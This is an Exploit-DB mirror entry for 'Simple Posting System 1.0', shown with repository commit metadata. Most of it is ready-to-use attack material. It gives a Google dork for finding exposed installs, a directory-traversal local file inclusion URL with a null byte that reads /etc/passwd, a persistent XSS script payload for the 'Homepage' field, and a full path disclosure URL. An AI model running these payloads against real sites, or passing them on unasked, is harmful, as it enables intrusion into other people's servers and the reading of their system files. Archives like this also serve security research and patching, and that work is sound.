exploit-db-mirror/exploits/php/webapps/18594.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
603 B
Text

# Exploit Title: Simple Posting System [Multple]
# Google Dork: inurl:sps.php?old= or inurl:sps.php "
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://realize.be/files/sps.tar.gz
# Version: 1.0 Final
# Tested on: Windows 7 / Linux(Ubuntu)
+[-- LFI --]+
http://localhost/sps.php?old=../../../../../../../../../../../../../../../../../etc/passwd%00
+[-- Persistent XSS --]+
Vulnerable Field = "Homepage"
Payload syntax: ><script>alert('XSS');</script>
+[-- FPD --]+
http://localhost/sps/sps_admin/comment.php?op=del&id=3&aantal=4
+[-- Shoutz --]+
All the belegit crew..